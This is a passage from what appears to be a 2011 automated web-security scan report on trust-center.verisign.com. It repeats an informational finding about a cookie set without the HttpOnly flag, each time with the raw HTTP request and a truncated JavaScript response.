TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2221 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..C...................................................................................................z.....f..O..3........3...f..}..3......r .f..ffff.ff.fffKa.3f.3ffWY_2PwCDL33.33f333(0I.3..3f....[SNIP]...
10.93. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/account_signin.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/account_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 741 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user...[SNIP]...
10.94. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/chat_support.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/chat_support.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 423 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height...[SNIP]...
10.95. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/default.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/default.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2794 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();} function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d...[SNIP]...
10.96. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/oo_conf_en-US_inline.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:36 GMT Server: ApacheSet-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1674 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ /* Create new OnlineOpini...[SNIP]...
10.97. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/oo_engine_c.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 28368 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var OnlineOpinion=new Ob...[SNIP]...
10.98. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/popup.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/popup.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 598 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(...[SNIP]...
10.99. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/product_white_list.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1005 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ...[SNIP]...
10.100. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/quick_signin.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 5155 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle...[SNIP]...
10.101. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/script_log.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/script_log.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1408 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}} function generateCall(level,message){var url='...[SNIP]...
10.102. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/src/dojo/dojo/dojo.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:25 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 89269 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved. Available via Academic Free License >= 2.1 OR the modified BSD license. see: http://dojotoolkit.org/license for details */ /* ...[SNIP]...
10.103. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/syscheck.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/syscheck.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: ApacheSet-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1470 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}} function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o...[SNIP]...
10.104. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/tealeaf/TealeafSDK.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
